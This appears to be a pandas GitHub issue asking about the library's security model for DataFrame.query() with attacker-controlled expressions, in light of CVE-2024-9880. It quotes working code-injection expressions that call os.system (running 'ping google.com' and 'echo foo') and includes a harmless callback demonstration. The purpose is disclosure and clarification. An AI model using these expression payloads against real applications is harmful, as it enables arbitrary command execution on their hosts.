Description
Research
- I have searched the [pandas] tag on StackOverflow for similar questions.
- I have asked my usage related question on StackOverflow.
Link to question on StackOverflow
(To clarify, this question was written by another user.)
Question about pandas
Hi, I saw this question on StackOverflow, which is about a public CVE, CVE-2024-9880.
The basic premise of the CVE is that if an attacker controls the expr argument to DataFrame.query(), then arbitrary code execution can be achieved.
The example given in the CVE is:
import pandas as pd
df = pd.DataFrame({'a': [1, 2, 3], 'b': ['error_details', 'confidential_info', 'normal']})
query = '@pd.core.frame.com.builtins.__import__("os").system("""ping google.com #""")'
try:
    engine = "python"
    result = df.query(query,local_dict={},engine="python",).index
except Exception as e:
    print(f'Error: {e}')
However, this is not minimal; a smaller reproduction would be:
import pandas as pd
df = pd.DataFrame()
expr = '@pd.compat.os.system("""echo foo""")'
result = df.query(expr, engine='python')
(The report also says that engine='python' is required, but both engine='python' and engine='numexpr' worked in my testing.)
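For anyone who wants to see the same mechanism without running a shell command, here is a harmless sketch. It assumes that query() will call a function referenced with the @ prefix, which is what the examples in this issue rely on. The names threshold and calls are hypothetical and exist only for this illustration; the function is passed in explicitly through local_dict, and engine='python' is used so that numexpr does not need to be installed.

```python
import pandas as pd

calls = []  # records every invocation of the hypothetical callback


def threshold():
    """Hypothetical stand-in for attacker-chosen code; it only logs the call."""
    calls.append("threshold was called")
    return 1


df = pd.DataFrame({"a": [1, 2, 3]})

# The expression string, not the surrounding program, decides that threshold() runs.
result = df.query(
    "a > @threshold()",
    engine="python",
    local_dict={"threshold": threshold},
)

print(calls)   # non-empty if query() invoked the function
print(result)  # rows filtered using the value the function returned
```

If calls is non-empty afterwards, the expression string caused a Python function call, which is the core of the concern: whoever writes expr chooses which reachable callables get invoked.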
My question is about Pandas's security model. What security guarantees does Pandas make about DataFrame.query() with an attacker-controlled expr?
My intuition about this is "none, don't do that," but I'm wondering what the Pandas project thinks.